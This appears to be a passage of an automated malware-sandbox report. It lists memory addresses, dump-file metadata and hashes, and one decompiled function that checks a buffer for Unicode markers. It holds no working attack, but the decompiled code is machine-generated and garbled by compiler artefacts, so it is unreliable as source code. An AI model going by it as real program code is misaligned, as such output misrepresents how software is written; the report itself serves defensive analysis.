                                  0x1e3bb301
                                  0x1e3bb303
                                  0x1e3bb303
                                  0x1e3bb308
                                  0x1e3bb30b
                                  0x1e3bb310
                                  0x1e3bb312
                                  0x1e3bb312
                                  0x1e3bb31c
                                  0x1e3bb322
                                  0x1e3bb327
                                  0x1e40a70e
                                  0x1e3bb335
                                  0x1e3bb337
                                  0x1e40a71d
                                  0x1e40a723
                                  0x1e40a723
                                  0x1e40a71d
                                  0x1e3bb340
                                  0x1e3bb345
                                  0x1e3bb349
                                  0x1e40a72a
                                  0x1e40a72a
                                  0x1e3bb352
                                  0x1e3bb357
                                  0x1e3bb359
                                  0x1e3bb359
                                  0x1e3bb365
                                  0x1e3bb367
                                  0x1e3bb36c
                                  0x00000000
                                  0x1e3bb36c
                                  0x1e40a714
                                  0x1e40a714
                                  0x1e3bb32f
                                  0x1e3bb3b8
                                  0x1e3bb3bd
                                  0x1e3bb3c4
                                  0x1e3bb425
                                  0x1e3bb427
                                  0x1e3bb429
                                  0x1e3bb429
                                  0x1e3bb427
                                  0x1e3bb3c8
                                  0x00000000
                                  0x00000000
                                  0x1e3bb3ce
                                  0x1e3bb42f
                                  0x1e3bb3d0
                                  0x1e3bb3d0
                                  0x1e3bb3d0
                                  0x1e3bb3d7
                                  0x1e3bb3da
                                  0x1e3bb3da
                                  0x00000000
                                  0x1e3bb32f
                                  0x1e3bb2f3
                                  0x1e3bb2d8
                                  0x1e3bb2c2
                                  0x1e3bb2af
                                  0x1e3bb1a3
                                  0x1e3bb1a9
                                  0x1e3bb1af
                                  0x1e3bb1b2
                                  0x1e3bb1b5
                                  0x1e3bb1b8
                                  0x1e40a733
                                  0x1e40a739
                                  0x1e40a739
                                  0x1e40a733
                                  0x1e3bb1c0
                                  0x00000000
                                  0x1e3bb1c6
                                  0x1e3bb1c8
                                  0x1e3bb1cb
                                  0x1e3bb1ce
                                  0x1e3bb1d3
                                  0x1e40a742
                                  0x1e40a748
                                  0x1e40a748
                                  0x1e40a742
                                  0x1e3bb1db
                                  0x00000000
                                  0x1e3bb1e1
                                  0x1e3bb1e1
                                  0x1e3bb1e6
                                  0x1e3bb1e9
                                  0x1e3bb1ee
                                  0x1e40a751
                                  0x1e3bb409
                                  0x1e3bb409
                                  0x1e3bb40e
                                  0x00000000
                                  0x00000000
                                  0x1e3bb410
                                  0x1e3bb22d
                                  0x1e3bb22f
                                  0x1e40a790
                                  0x1e40a796
                                  0x1e40a796
                                  0x1e40a790
                                  0x1e3bb23d
                                  0x1e3bb243
                                  0x1e3bb248
                                  0x1e40a79f
                                  0x00000000
                                  0x00000000
                                  0x1e40a7a5
                                  0x00000000
                                  0x1e3bb24e
                                  0x1e3bb24e
                                  0x1e3bb250
                                  0x1e3bb374
                                  0x1e3bb379
                                  0x1e3bb37e
                                  0x1e40a7ae
                                  0x1e40a7b4
                                  0x1e40a7b4
                                  0x1e40a7ae
                                  0x1e3bb386
                                  0x00000000
                                  0x1e3bb38c
                                  0x1e3bb38e
                                  0x1e40a7bd
                                  0x1e3bb394
                                  0x1e3bb394
                                  0x1e3bb394
                                  0x1e3bb39b
                                  0x1e3bb39e
                                  0x00000000
                                  0x1e3bb39e
                                  0x1e3bb386
                                  0x1e3bb256
                                  0x1e3bb258
                                  0x1e40a7c6
                                  0x1e40a7cc
                                  0x1e40a7cc
                                  0x1e40a7c6
                                  0x1e3bb261
                                  0x1e3bb266
                                  0x1e3bb26a
                                  0x1e40a7d3
                                  0x1e40a7d3
                                  0x1e3bb273
                                  0x1e3bb278
                                  0x1e3bb27a
                                  0x1e3bb27a
                                  0x1e3bb281
                                  0x1e3bb283
                                  0x1e3bb285
                                  0x1e3bb287
                                  0x1e3bb289
                                  0x00000000
                                  0x1e3bb289
                                  0x1e3bb248
                                  0x1e40a757
                                  0x1e40a757
                                  0x1e3bb1f6
                                  0x00000000
                                  0x00000000
                                  0x1e3bb1fc
                                  0x1e3bb201
                                  0x1e40a760
                                  0x1e40a766
                                  0x1e40a766
                                  0x1e40a760
                                  0x1e3bb209
                                  0x1e3bb3a8
                                  0x1e40a76f
                                  0x1e3bb3ae
                                  0x1e3bb3ae
                                  0x1e3bb3ae
                                  0x1e3bb3b0
                                  0x00000000
                                  0x1e3bb20f
                                  0x1e3bb20f
                                  0x1e3bb213
                                  0x1e40a778
                                  0x1e40a77e
                                  0x1e40a77e
                                  0x1e40a778
                                  0x1e3bb21b
                                  0x00000000
                                  0x1e3bb221
                                  0x1e3bb223
                                  0x1e40a787
                                  0x1e3bb229
                                  0x1e3bb229
                                  0x1e3bb229
                                  0x1e3bb22b
                                  0x00000000
                                  0x1e3bb22b
                                  0x1e3bb21b
                                  0x1e3bb209
                                  0x1e3bb1db
                                  0x1e3bb142
                                  0x1e3bb142
                                  0x1e3bb146
                                  0x1e3bb148
                                  0x1e3bb14c
                                  0x1e3bb14f
                                  0x1e3bb154
                                  0x1e3bb15b
                                  0x1e40a6b4
                                  0x00000000
                                  0x00000000
                                  0x1e40a6ba
                                  0x1e40a6ba
                                  0x1e3bb163
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3bb163
                                  0x1e3bb13a
                                  0x1e3bb169
                                  0x1e3bb16b
                                  0x1e3bb16e
                                  0x1e3bb171
                                  0x1e3bb175
                                  0x1e3bb178
                                  0x1e40a6c3
                                  0x1e40a6c9
                                  0x1e40a6c9
                                  0x1e40a6c3
                                  0x1e3bb180
                                  0x1e3bb184
                                  0x00000000
                                  0x1e3bb104
                                  0x1e3bb0f6

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                  • Instruction ID: 3d3406fa12316aec2a88ec7b17b061fa57fdf5567aa246c6c0c3ffefdab9945a
                                  • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                  • Instruction Fuzzy Hash: 1FD1F231B202468BC729CE2AC49025AB7A6AF85354F298779DC9BCFB49EF31D8419750
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3A0D20, Relevance: .4, Instructions: 372COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 99%
                                  			E1E3A0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x1e496d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x1e496920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x1e496920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x1e3a1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M1E3A1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                  0x1e3a0d2b
                                  0x1e3a0d2e
                                  0x1e3a0d32
                                  0x1e3a0d39
                                  0x1e3a0d3b
                                  0x1e3a0d3d
                                  0x1e3a0d3f
                                  0x1e3a0d46
                                  0x1e3a0d4d
                                  0x1e3a0d54
                                  0x1e3a0d5b
                                  0x1e3a0d62
                                  0x1e3a0d69
                                  0x1e3a0d70
                                  0x1e3a0d77
                                  0x1e3a0d7e
                                  0x1e3a0d85
                                  0x1e3a0d88
                                  0x1e3a0d8b
                                  0x1e3a0d8e
                                  0x1e3a0d91
                                  0x1e3a0d94
                                  0x1e3a0d97
                                  0x1e3a0d9a
                                  0x1e3a0d9d
                                  0x1e3a0da6
                                  0x1e3a10e9
                                  0x1e3a10ee
                                  0x1e3a0db9
                                  0x1e3a0db9
                                  0x1e3a0dbc
                                  0x1e3fe9c7
                                  0x1e3fe9ca
                                  0x1e3fe9cd
                                  0x1e3fe9d0
                                  0x1e3fe9dd
                                  0x1e3fe9dd
                                  0x1e3a0dec
                                  0x1e3a0dec
                                  0x1e3a0dee
                                  0x1e3a0df3
                                  0x1e3a0ebf
                                  0x1e3a0ec0
                                  0x00000000
                                  0x1e3a0df9
                                  0x1e3a0df9
                                  0x1e3a0e1e
                                  0x1e3a0e21
                                  0x1e3a0e24
                                  0x1e3a0e27
                                  0x1e3a0e2a
                                  0x1e3a0e2d
                                  0x1e3a0e30
                                  0x1e3a0e36
                                  0x1e3a1040
                                  0x1e3a1043
                                  0x1e3a1049
                                  0x1e3a1049
                                  0x1e3a0e3c
                                  0x1e3a0e3f
                                  0x1e3a1007
                                  0x1e3a100a
                                  0x1e3a1010
                                  0x1e3a1010
                                  0x1e3a100a
                                  0x1e3a0e3f
                                  0x1e3a0e58
                                  0x1e3a0e5d
                                  0x1e3a1000
                                  0x1e3a0e63
                                  0x1e3a0e63
                                  0x1e3a0e63
                                  0x1e3a0e67
                                  0x1e3a0e69
                                  0x1e3a0e69
                                  0x1e3a0e6d
                                  0x1e3a0e70
                                  0x1e3a0e74
                                  0x1e3a0e76
                                  0x1e3a0e76
                                  0x1e3a0e7a
                                  0x1e3a0e7c
                                  0x1e3a0e7c
                                  0x1e3a0e83
                                  0x1e3a0e86
                                  0x1e3a0e87
                                  0x1e3a0e89
                                  0x1e3a0e8b
                                  0x1e3a0e91
                                  0x1e3a0e00
                                  0x1e3a0e03
                                  0x1e3a0e03
                                  0x1e3a0e07
                                  0x1e3a0e0f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0e0f
                                  0x1e3a0e97
                                  0x1e3a0e9c
                                  0x1e3a113e
                                  0x1e3a1141
                                  0x1e3a1143
                                  0x1e3a0eb1
                                  0x1e3a0eb1
                                  0x1e3a0eb4
                                  0x1e3a0eb6
                                  0x1e3a1110
                                  0x1e3a1112
                                  0x1e3fea25
                                  0x1e3fea25
                                  0x1e3a0ec3
                                  0x1e3a0ec3
                                  0x1e3a0ecb
                                  0x1e3a10fe
                                  0x1e3a0ed1
                                  0x1e3a0ed1
                                  0x1e3a0ed1
                                  0x1e3a0ed3
                                  0x1e3a0edb
                                  0x1e3fea2d
                                  0x1e3fea2f
                                  0x1e3fea31
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3fea37
                                  0x1e3fea37
                                  0x1e3fea3a
                                  0x1e3fea3e
                                  0x1e3fea47
                                  0x1e3fea4a
                                  0x1e3fea4c
                                  0x1e3fea4d
                                  0x1e3fea4d
                                  0x1e3fea4e
                                  0x1e3fea4e
                                  0x1e3fea51
                                  0x1e3fea52
                                  0x1e3fea52
                                  0x00000000
                                  0x1e3a0ee1
                                  0x1e3a0ee1
                                  0x1e3a0ee1
                                  0x1e3a0ee3
                                  0x1e3a0ee3
                                  0x1e3a0ee6
                                  0x1e3a0eec
                                  0x1e3fea5b
                                  0x1e3fea5d
                                  0x1e3a0ef6
                                  0x1e3a0ef8
                                  0x1e3fea6f
                                  0x1e3fea6f
                                  0x1e3a0efe
                                  0x1e3a0efe
                                  0x1e3a0f03
                                  0x1e3fea7b
                                  0x1e3fea7d
                                  0x00000000
                                  0x00000000
                                  0x1e3fea83
                                  0x1e3fea85
                                  0x00000000
                                  0x00000000
                                  0x1e3fea8b
                                  0x1e3fea91
                                  0x00000000
                                  0x00000000
                                  0x1e3fea97
                                  0x1e3fea9a
                                  0x1e3feaa0
                                  0x1e3feaa2
                                  0x1e3feaa2
                                  0x1e3feaae
                                  0x1e3feab3
                                  0x1e3feab6
                                  0x1e3feabf
                                  0x1e3feaca
                                  0x1e3feacd
                                  0x1e3fead1
                                  0x1e3fead1
                                  0x1e3feab8
                                  0x1e3feab8
                                  0x1e3feab8
                                  0x1e3fead2
                                  0x1e3fead9
                                  0x1e3a0f0e
                                  0x1e3a0f15
                                  0x1e3a0f17
                                  0x1e3a0f17
                                  0x1e3a0f1e
                                  0x1e3a0f23
                                  0x1e3feae1
                                  0x1e3feae1
                                  0x1e3a0f38
                                  0x1e3a0f3a
                                  0x1e3a0f3a
                                  0x1e3a0f49
                                  0x1e3a1108
                                  0x1e3a1108
                                  0x1e3a0f5b
                                  0x1e3a10c7
                                  0x1e3a10ca
                                  0x1e3a10cc
                                  0x00000000
                                  0x00000000
                                  0x1e3a10dc
                                  0x1e3a10de
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0f61
                                  0x1e3a0f61
                                  0x1e3a0f61
                                  0x1e3a0f67
                                  0x1e3a0f6b
                                  0x1e3a111d
                                  0x1e3a111d
                                  0x1e3a0f75
                                  0x1e3a0f77
                                  0x1e3a0f77
                                  0x1e3a0f85
                                  0x1e3a0f8b
                                  0x1e3a10b9
                                  0x1e3a10bc
                                  0x1e3feae9
                                  0x1e3feae9
                                  0x1e3a0f91
                                  0x1e3a0f91
                                  0x1e3a0f91
                                  0x1e3a0f96
                                  0x1e3a0f98
                                  0x1e3a0f9a
                                  0x1e3a0f9a
                                  0x1e3a0fa6
                                  0x1e3a107c
                                  0x1e3a107f
                                  0x1e3a108d
                                  0x00000000
                                  0x1e3a108d
                                  0x1e3a1081
                                  0x1e3a1087
                                  0x1e3feaf4
                                  0x1e3feafa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3feb00
                                  0x00000000
                                  0x1e3a0fac
                                  0x1e3a0fac
                                  0x00000000
                                  0x1e3a0fac
                                  0x1e3a0fa6
                                  0x1e3a0f5b
                                  0x1e3a0f09
                                  0x1e3a0f09
                                  0x00000000
                                  0x1e3a0f09
                                  0x1e3fea63
                                  0x00000000
                                  0x1e3fea63
                                  0x1e3a0ef4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0ef4
                                  0x1e3a0ebc
                                  0x1e3a0ebc
                                  0x00000000
                                  0x1e3a0ebc
                                  0x1e3a0eb6
                                  0x1e3a1149
                                  0x1e3a114c
                                  0x1e3a114d
                                  0x00000000
                                  0x1e3a114d
                                  0x1e3a0ea4
                                  0x1e3a0ea7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0fb7
                                  0x1e3a0fb7
                                  0x1e3a0fbc
                                  0x1e3a0fc9
                                  0x1e3a0fc9
                                  0x1e3a0fce
                                  0x1e3a1020
                                  0x1e3a1025
                                  0x1e3a1094
                                  0x1e3a1094
                                  0x1e3a1099
                                  0x1e3fea04
                                  0x1e3fea04
                                  0x1e3fea09
                                  0x1e3fea1c
                                  0x1e3fea0b
                                  0x1e3fea0b
                                  0x1e3fea0e
                                  0x1e3fea14
                                  0x1e3fea14
                                  0x1e3fea0e
                                  0x1e3fea09
                                  0x1e3a1027
                                  0x1e3a1027
                                  0x1e3a1155
                                  0x1e3a102d
                                  0x1e3a102d
                                  0x1e3a102d
                                  0x1e3a1032
                                  0x1e3fe9fc
                                  0x1e3fe9fc
                                  0x1e3a1032
                                  0x1e3a1027
                                  0x00000000
                                  0x1e3a1025
                                  0x1e3a0fd0
                                  0x1e3fe9f4
                                  0x00000000
                                  0x1e3fe9f4
                                  0x1e3a0fd6
                                  0x1e3a0fd9
                                  0x1e3a1059
                                  0x1e3a1059
                                  0x1e3a105e
                                  0x1e3fe9ec
                                  0x1e3a1064
                                  0x1e3a1064
                                  0x1e3a1064
                                  0x1e3a1069
                                  0x1e3a10ac
                                  0x1e3a106b
                                  0x1e3a106b
                                  0x1e3a106e
                                  0x1e3a1074
                                  0x1e3a1074
                                  0x1e3a106e
                                  0x1e3a1069
                                  0x00000000
                                  0x1e3a105e
                                  0x1e3a0fdb
                                  0x1e3a10a4
                                  0x00000000
                                  0x1e3a10a4
                                  0x1e3a0fe1
                                  0x1e3a0fe4
                                  0x00000000
                                  0x00000000
                                  0x1e3a0fea
                                  0x1e3a0ff1
                                  0x00000000
                                  0x1e3a0ff8
                                  0x00000000
                                  0x00000000
                                  0x1e3fe9e4
                                  0x00000000
                                  0x00000000
                                  0x1e3a1018
                                  0x00000000
                                  0x00000000
                                  0x1e3a1051
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0ff1
                                  0x1e3a0fbe
                                  0x1e3a0fc3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0fc3
                                  0x1e3a0df3
                                  0x1e3fe9d5
                                  0x1e3fe9d7
                                  0x1e3a1128
                                  0x1e3a1128
                                  0x1e3a112b
                                  0x1e3a112d
                                  0x1e3a1133
                                  0x1e3a1133
                                  0x00000000
                                  0x1e3a112d
                                  0x00000000
                                  0x1e3fe9d7
                                  0x1e3a0dc2
                                  0x1e3a10f6
                                  0x1e3a0dd4
                                  0x1e3a0dd7
                                  0x1e3a0dda
                                  0x1e3a0de8
                                  0x1e3a0de9
                                  0x1e3a0de9
                                  0x1e3a0dda
                                  0x00000000
                                  0x1e3a0dc2
                                  0x1e3a0dac
                                  0x1e3a0dae
                                  0x1e3a0db3
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 66d3f00646f9225503ad99a059ca1b3a192abb00ffb62dae1ac5b5f8f6d3e209
                                  • Instruction ID: 88f218f0039f003e96c1d8a2eb9c9e775ce3d876f32cb603a9c7f160fa2be351
                                  • Opcode Fuzzy Hash: 66d3f00646f9225503ad99a059ca1b3a192abb00ffb62dae1ac5b5f8f6d3e209
                                  • Instruction Fuzzy Hash: 96D18C71E046598BDB08CE9AC5A07AEFBF6EFC4350F108369E642E6285D77889C1CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00081072, Relevance: .3, Instructions: 319COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9bd5b00ee3b6eabd0e3de86aad9f9d0f09f4f1af72fed8bcd37219608a816d6e
                                  • Instruction ID: 194b6fe6391df87c9c77b9c9f5e5ba1a4d22c44b092c3f2c44ca5da5cd63615d
                                  • Opcode Fuzzy Hash: 9bd5b00ee3b6eabd0e3de86aad9f9d0f09f4f1af72fed8bcd37219608a816d6e
                                  • Instruction Fuzzy Hash: 2AB14671224A488FDB59FF24C885EEA73E4FF94315F40056DA59BCB151EF30AA45CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00081069, Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e229fdfb3e99d5020f13157f074746f72344f2fb3f0950de1dd59389c2ec612
                                  • Instruction ID: 01f32925e9b16bd9eb761ec553ba2a7ba4c3bdca2493c76546400a5bee8d67cf
                                  • Opcode Fuzzy Hash: 8e229fdfb3e99d5020f13157f074746f72344f2fb3f0950de1dd59389c2ec612
                                  • Instruction Fuzzy Hash: 02B15571224A498FDB59FF24C885EEAB3E4FF94304F40056EA59BCB151DF30AA45CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

